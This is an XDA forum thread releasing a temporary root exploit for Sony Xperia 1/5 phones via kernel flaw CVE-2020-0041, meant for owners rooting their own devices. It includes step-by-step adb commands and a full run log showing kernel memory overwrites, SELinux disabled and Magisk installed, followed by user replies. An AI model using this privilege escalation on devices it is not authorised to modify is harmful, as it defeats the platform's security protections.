• Introducing XDA Computing: Discussion zones for Hardware, Software, and more!    Check it out!

[xperia 1/5] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
temp root exploit for sony XPERIA 1 and XPERIA 5 with android 10 firmware
including temporal magisk setup from the exploit

The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
This is a modification of the Pixel 3 specific exploit to be compatible with kernel 4.14 that is used with xperia 1/5 phones.
This work has been done in collaboration with @bb-qq, who has implemented support of JP model of xperia 1.
The exploit is extended in a way allowing setup of magisk v20.4 from the temp root, including working su permission asking notification support.
It uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as android service.
There are also many extensions implemented to make the exploit stable with kernel 4.14.

SUPPORTED TARGETS
The exploit has been tested only with the JP model of xperia 1 (the 802SO-55.1.B.0.202 target), but support for other targets have been implemented based on static analysis of each kernel image from target firmware.
Please note, it is unlikely that any other fw version than those listed above would work.
The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

USAGE HOWTO INCLUDING MAGISK SETUP
  • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
  • enable developer mode options and in there adb debugging (eventually install adb drivers)
  • download the x1x5-mroot.zip with the exploit attached in this post
  • download Magisk-v20.4.zip from magisk releases page on github here
  • use 'adb push x1x5-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
  • unzip and prepare magisk setup with following commands in 'adb shell'
    Code:
    cd /data/local/tmp
    unzip x1x5-mroot.zip
    chmod 755 x1x5-mroot magisk-setup.sh magisk-start.sh
    ./magisk-setup.sh
  • get temp root and start magisk up with following commands in 'adb shell' - do not copy paste them all at once, but enter (or copy&paste) each line separately one by one:
    Code:
    cd /data/local/tmp
    ./x1x5-mroot
    ./magisk-start.sh -1
    ./magisk-start.sh -2
    ./magisk-start.sh -3

If it worked, you should see something like this:

Code:
802SO:/ $ cd /data/local/tmp
802SO:/data/local/tmp $ ./x1x5-mroot
[+] factoryversion = '802SO-55.1.B.0.202'
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffe5cd6e3b00
[+] file epitem at ffffffe54d87eb00
[+] Reallocating content of 'write8_inode' with controlled data..[DONE]
[+] Overwriting 0xffffffe5cd6e3b20 with 0xffffffe54d87eb50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff90392212d0
[+] kernel base: ffffff9037e80000
[+] init_cred: ffffff903a02d808
[+] memstart_addr: 0xffffffdbc0000000
[+] First level entry: 145437003 -> next table at ffffffe585437000
[+] Second level entry: 1e6b41003 -> next table at ffffffe626b41000
[+] sysctl_table_root = ffffff903a05d380
[+] Reallocating content of 'write8_sysctl' with controlled data.[DONE]
[+] Overwriting 0xffffffe6352bcb68 with 0xffffffe54b8a3000...[DONE]
[+] Injected sysctl node!
[+] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff903a772ffc with 0x0...[DONE]
[+] Node write8_inode, pid 10824, kaddr ffffffe4e3d18c00
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 11452, kaddr ffffffe58324c400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 11338, kaddr ffffffe4e3c05980
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffe5cd6e3b20
[+] epitem.prev = ffffffe5cd6e3bd0
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ FRESH=true
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
+ FRESH=false
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ FRESH=true
+ STAGE=2
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ true
+ rm -rf /data/adb/magisk.db /data/adb/magisk
+ mkdir -p /data/adb/magisk
+ chmod 700 /data/adb
+ cp -a busybox /data/adb/magisk
+ cp -a magisk /data/adb/magisk
+ cp -a magiskboot /data/adb/magisk
+ cp -a magiskinit /data/adb/magisk
+ cp -a util_functions.sh /data/adb/magisk
+ cp -a boot_patch.sh /data/adb/magisk
+ chmod -R 755 /data/adb/magisk
+ chown -R root:root /data/adb/magisk
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14100
+ '[' -z 14100 ']'
+ >/sbin/.magisk/escalate
+ echo 14100
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
+ FRESH=false
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC=''
+ timeout=10
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14131
+ '[' -n 14131 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.14.117-perf+ #1 SMP PREEMPT Wed Jan 15 23:36:28 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce
Permissive

Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission should work now.
Please be sure to use 'exit' command to cleanly end the temp root shell. Do not close the window instead. It is needed for proper cleanup.

Please be careful what you use the temp root for.
Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

DRM KEY / TA PARTITION BACKUP POSSIBILITY
Please note, this exploit will get you a root shell with still locked xperia 1 and 5 phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there.
Even though xperia 1 and 5 allows to relock bootloader after unlock, possibly returning drm functionalities, it is very probable that a device key (device specific drm key residing in 66667 ta unit) is still erased on bootloader unlock (and re-lock), so backing up and restoring TA with the key present may actually be useful.
This is something to be tested - anybody considering bootloader unlock of xperia 1 or 5, please be sure to backup TA from still locked state via this exploit and also TA after unlock for comparison.
For more details see here and following post.

SOURCES
Exploit sources are available at my github here.

CREDITS
Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.
Thanks to @bb-qq for initial xperia 1 support and testing.

DONATIONS
If you like my work, you can donate using the Donate to Me button with several methods there.
Thank you very much to all who donate.

DOWNLOAD
 

Attachments

  • x1x5-mroot.zip
    20.6 KB · Views: 535
Last edited:

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@Coolty, you need to run one of the listed firmware versions in order for the exploit to work. You may need to downgrade.
@nos1609, yes, it may be like that. You should enter (or copy&paste) each line separatelly one by one, not all of them at once to have it more stable. It does not work from a script or pasted as a block of commands.
Also be sure to use 'exit' command to end the temp root shell. Do not just close the adb shell window without using the 'exit' command. The 'exit' command is needed to finish proper cleanup after the exploit.
You can disconnect from usb after terminating adb shell with 'exit' command, do not disconnect before exiting it.
 
  • Like
Reactions: Chima2

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@nitrams, xperia 10 kernel is not vulnerable to CVE-2019-2215, at least the two kernel source packages (53.1.A.2.2 and 53.0.A.2.139) released by sony contain the fix for it.
These two kernels are not vulnerable to CVE-2020-0041 either.
 
  • Like
Reactions: Chima2

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@nitrams, I have no idea how it is with other fw versions or other possible vulnerabilities. Sources are released only for the two I have mentioned above (and one of them is even corrupted, so it cannot be fully unpacked). I would assume that 53.0.A.2.139 is android 9.
 
  • Like
Reactions: Chima2

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@TrustAugustus, with a functional twrp it would not be a temp root any more, would be?
Just backup TA partition and then unlock the bootloader.
You can re-lock with xperia 1/5 if you need.
After re-lock, use the temp root again and restore the locked state TA backup.
 
  • Like
Reactions: Aqq123 and Chima2

madshark2009

Senior Member
Aug 18, 2012
754
103
can anyone report this as 100% working and when relocking the bootloader and restoring the TA, does the phone go back completely to manufacturer state?
 

RickyVaughn99

Member
Oct 2, 2014
8
0
Dear folks,

lack of some precise details of using this method ...
Can somebody please tell me the exact procedure to do after the
Code:
cd /data/local/tmp
unzip x1x5-mroot.zip
chmod 755 x1x5-mroot magisk-setup.sh magisk-start.sh
./magisk-setup.sh
just to avoid painfil errors ...?

I have all my prerequisites together and I'm on J9210-55.1.A.3.112 stock, bootloader locked.

1. After the magisk-setup.sh has finished, can/should I directly proceed in the same adb shell with
Code:
./x1x5-mroot
./magisk-start.sh -1
./magisk-start.sh -2
./magisk-start.sh -3
?
2. Where to enter the "su" ?

3. I want to install some apps that require root (titanium backup, greenify, afwall+ ...). Using the proposed method, at what point and in which way am I able to do so?

4. I want to backup the TA with the script by devshaft. Can I do this when the temp root shell is still open ?

The section od Post 1 that confuses me most is
Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission should work now.
Please be sure to use 'exit' command to cleanly end the temp root shell. Do not close the window instead. It is needed for proper cleanup.

Best regards,

RV.
 

RickyVaughn99

Member
Oct 2, 2014
8
0
Okay, Update:

I followed the steps from post 1 an am stuck now.
Everything went okay regarding the run of the scripts, then I typed "exit" in tthe adb shell. Now my phone is dead after getting slower and slower over a minute.
Some hints what to do ?

Edit: After hard reset (volume up + power few seconds) and a second run now all works fine.
Thanks for support.
 
Last edited:

Top Liked Posts

  • There are no posts matching your filters.
  • 20
    temp root exploit for sony XPERIA 1 and XPERIA 5 with android 10 firmware
    including temporal magisk setup from the exploit

    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    This is a modification of the Pixel 3 specific exploit to be compatible with kernel 4.14 that is used with xperia 1/5 phones.
    This work has been done in collaboration with @bb-qq, who has implemented support of JP model of xperia 1.
    The exploit is extended in a way allowing setup of magisk v20.4 from the temp root, including working su permission asking notification support.
    It uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as android service.
    There are also many extensions implemented to make the exploit stable with kernel 4.14.

    SUPPORTED TARGETS
    The exploit has been tested only with the JP model of xperia 1 (the 802SO-55.1.B.0.202 target), but support for other targets have been implemented based on static analysis of each kernel image from target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the x1x5-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push x1x5-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip x1x5-mroot.zip
      chmod 755 x1x5-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell' - do not copy paste them all at once, but enter (or copy&paste) each line separately one by one:
      Code:
      cd /data/local/tmp
      ./x1x5-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    802SO:/ $ cd /data/local/tmp
    802SO:/data/local/tmp $ ./x1x5-mroot
    [+] factoryversion = '802SO-55.1.B.0.202'
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffe5cd6e3b00
    [+] file epitem at ffffffe54d87eb00
    [+] Reallocating content of 'write8_inode' with controlled data..[DONE]
    [+] Overwriting 0xffffffe5cd6e3b20 with 0xffffffe54d87eb50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff90392212d0
    [+] kernel base: ffffff9037e80000
    [+] init_cred: ffffff903a02d808
    [+] memstart_addr: 0xffffffdbc0000000
    [+] First level entry: 145437003 -> next table at ffffffe585437000
    [+] Second level entry: 1e6b41003 -> next table at ffffffe626b41000
    [+] sysctl_table_root = ffffff903a05d380
    [+] Reallocating content of 'write8_sysctl' with controlled data.[DONE]
    [+] Overwriting 0xffffffe6352bcb68 with 0xffffffe54b8a3000...[DONE]
    [+] Injected sysctl node!
    [+] Reallocating content of 'write8_selinux' with controlled data.[DONE]
    [+] Overwriting 0xffffff903a772ffc with 0x0...[DONE]
    [+] Node write8_inode, pid 10824, kaddr ffffffe4e3d18c00
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 11452, kaddr ffffffe58324c400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 11338, kaddr ffffffe4e3c05980
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffe5cd6e3b20
    [+] epitem.prev = ffffffe5cd6e3bd0
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + FRESH=true
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + FRESH=true
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + true
    + rm -rf /data/adb/magisk.db /data/adb/magisk
    + mkdir -p /data/adb/magisk
    + chmod 700 /data/adb
    + cp -a busybox /data/adb/magisk
    + cp -a magisk /data/adb/magisk
    + cp -a magiskboot /data/adb/magisk
    + cp -a magiskinit /data/adb/magisk
    + cp -a util_functions.sh /data/adb/magisk
    + cp -a boot_patch.sh /data/adb/magisk
    + chmod -R 755 /data/adb/magisk
    + chown -R root:root /data/adb/magisk
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14100
    + '[' -z 14100 ']'
    + >/sbin/.magisk/escalate
    + echo 14100
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14131
    + '[' -n 14131 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.14.117-perf+ #1 SMP PREEMPT Wed Jan 15 23:36:28 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce
    Permissive

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission should work now.
    Please be sure to use 'exit' command to cleanly end the temp root shell. Do not close the window instead. It is needed for proper cleanup.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
    Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    DRM KEY / TA PARTITION BACKUP POSSIBILITY
    Please note, this exploit will get you a root shell with still locked xperia 1 and 5 phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there.
    Even though xperia 1 and 5 allows to relock bootloader after unlock, possibly returning drm functionalities, it is very probable that a device key (device specific drm key residing in 66667 ta unit) is still erased on bootloader unlock (and re-lock), so backing up and restoring TA with the key present may actually be useful.
    This is something to be tested - anybody considering bootloader unlock of xperia 1 or 5, please be sure to backup TA from still locked state via this exploit and also TA after unlock for comparison.
    For more details see here and following post.

    SOURCES
    Exploit sources are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.
    Thanks to @bb-qq for initial xperia 1 support and testing.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
    4
    Thank you for publishing this!
    Here is all FTFs for Japanese models:
    https://ftf.andro.plus/
    2
    just tried restoring the locked ta backup
    It is not able to circumvent the Has Ever Been Unlocked state, so seems like it is stored somewhere else and thus TA backup makes no sense... In Russia the warranty would be still void if unlocked, no matter the issue.

    Assuming you first re-locked the phone and then restored the locked TA from the exploit root shell.

    It is not only about the "Has Ever Been Unlocked" flag.
    There is a possibility, that if you re-lock the bootloader _and_ restore locked TA backup, that you get all drm functionality back.
    You can check your TA-unlocked.img if bootloader unlock did erase the device key, i.e. 66667 TA unit.
    While this unit should be present in the TA-locked.img.

    You can check the unit in both images by use of 'readta' command line utility, source code available here:
    Alternatively you can find built windows executable attached.

    Could you please check it, like in following way:
    Code:
    E:\mingw>readta.exe
    Usage: readta -i <ta image or partition> -u <unit> [ -o <output file> -q ]
    
    E:\mingw>readta.exe -i TA-locked.img -u 66667 -h
    15 42 87 AF 49 7C 62 37 A4 34 F7 08 C8 3F 20 0B
    E:\mingw>readta.exe -i TA-unlocked.img -u 66667 -h
    
    E:\mingw>
    This should confirm (or not) if sony erases drm key with bootloader unlock, possibly therefore loosing some drm feature(s) that would not be restored by bootloader re-lock, as already suspected here.
    2
    @TrustAugustus, with a functional twrp it would not be a temp root any more, would be?
    Just backup TA partition and then unlock the bootloader.
    You can re-lock with xperia 1/5 if you need.
    After re-lock, use the temp root again and restore the locked state TA backup.